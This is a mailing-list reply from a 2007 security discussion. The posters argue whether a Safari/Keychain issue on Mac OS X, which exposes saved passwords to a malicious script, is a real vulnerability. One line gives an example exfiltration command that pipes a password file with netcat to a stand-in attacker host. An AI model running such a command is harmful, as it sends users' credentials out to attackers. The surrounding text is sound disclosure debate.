Re: Apple Safari on MacOSX may reveal user's saved passwords
On 17 May 2007, at 7:50 PM, graham.coles@the-logic-group.com wrote:
> It is also why I don't leave my machine logged in and accessible to
> other
> users, which appears to be the whole basis of this 'vulnerability'.
this is NOT the basis of the vulnerability. The point is that
normally a malicious applications running as a nonroot are not able
to read keychained passwords.
In this case to steal passwords is sufficent to entice the victim to
execute a malicious script, that normally it's not enough since
keychain refuses access to untrusted applications.
This issue exposes keychained password as those are saved in a text
file: an inexperienced user can loose his password by executing an
untrusted malicious shell script (ie "cat /home/pop/pass | nc
steal.com 666")
>
> The whole concept of the keychain, however, is to restrict access
> to its
> contents to the owner. If you can happily log in as the owner, then
> you
> have everything they can access, INCLUDING the keychain. If they
> can't do
> this, you just have some encrypted data. You don't HAVE to store web
> passwords, of course.
keychain asks for password when the owner wants to see his data and
having access to a computer doesn't mean that you have the login
password too
> If you are sitting at the machine of a person who has left it
> logged in
> and they use this feature, then whatever web browser you are using
> will
> believe you are that person and provide access to the website
> automatically--you don't need to see the password to use it.
and what if you gain a 5 minutes access to a laptop in the middle of
the desert where internet connection is missing . . .
>
> I'd like to know what Apple were supposed to do to fix this?
i think it's sufficent to untrust the injected code....
>
> It is, after all, YOUR keychain with YOUR passwords that YOU want
> applications to recover when YOU are logged in. Why shouldn't YOU
> be able
> to access it. If you don't want to use it don't, but if someone has
> to be
> logged in as you to read it, that sounds about right.
right?? it's like having passwords saved in a text file and 'chmod
700' it
>
>>> Someone has *ROOT* access to your system REMOTELY over ssh and
>>> you're
>>> worried that they might be able to retrieve a password from your
> keychain.
rooting a computer is really not the point, it' quite obvious that
"rooted comp" => "TOTAL compromise"
Let me make a question: what if safari makes loaded password part of
the html so it's shown when clicking "view page source" ..?? should
it be considered a vulnerability??
cheers,
-poplix
>
>> Yes, it would be annoying if someone rooted my laptop. It would be a
>> lot more annoying if they not only rooted my laptop but also
>> cleaned out
>> my bank account via my browser.
>
> 'Annoying' is the understatement of the millennium.
>
> As far as root access goes, see my comments above regarding key
> loggers?
>
> With root access they will have your gpg file, they will know what
> processes are running (they will know when you run gpg) and they can
> capture your keystrokes. Is this then a vulnerability of gpg? So
> much for
> keeping your online banking safe. Even if you memorize the
> passwords, they
> can still see your keypresses and thereofre empty your bank account.
>
> If someone roots your machine, security is non-existant and trust
> beyond
> repair. Don't trivialize this by comparing it to a 'might be able
> to see
> your web passwords' issue, this is disaster incarnate and game over
> all
> rolled into one!
>
>> It *is* somewhat disturbing that root can so trivially interfere with
>> the guts of someone else's processes. Normally, root has to do a
>> lot of
>> work to do that.
>
> With great power comes great responsibility, which is precisely why
> Macs
> have the root login disabled and require a user designated as
> 'Administrator' to authenticate themself whenever system files are
> modified or installed. Other users are created as non-administrator
> and
> remote login is blocked by the firewall. The chances of anyone
> actually
> logging in remotely as root on a normal Mac are zero as you, while
> administrator, would have to specifically enable all of this. This
> is why
> Apple warn you not to do it.
>
>>>> a different non-root user on the console can do it too
>>> Which again restricts this vunerability (as previously mentioned) to
> an
>>> attacker who happens to be sitting in front of your machine(!)
>
>> Did you read the bit where I speculated about setuid applications?
>
> Yes, but again if you can get this far you either have the person's
> identity or root access (bad or hopeless situation respectively). Why
> worry incessantly about things that you stored in the keychain being
> accessed when someone can access everything you own.
>
> Should the keychain refuse to divulge its contents to a person
> authenticated as the owner?
>
> Is the answer to remove the keychain and watch as people revert to
> storing
> their passwords unencrypted in stickies, or text files on their
> desktop?
>
> You normally have to come up with a feasible attack vector for
> something
> to be a vulnerability, this seems far too early to be notifying the
> vendor.
>
> Saving passwords on any web browser is a lousy idea from a security
> perspective. However, people don't like security, they like
> convenience.
> The only real fix here is perhaps a disclaimer message advising
> people not
> to store important passwords for websites in the browser in the first
> place. But lets face reality, even if the did would it stop people
> doing
> it?
>
>> --
>> David Cantrell
>
> --
> Graham Coles
>
>
>
> The Logic Group Enterprises Limited
> Logic House, Waterfront Business Park, Fleet Road, Fleet,
> Hampshire, GU51 3SB, UK
> Registered in England. Registered No. 2609323
討論串 (同標題文章)
完整討論串 (本文為第 9 之 11 篇):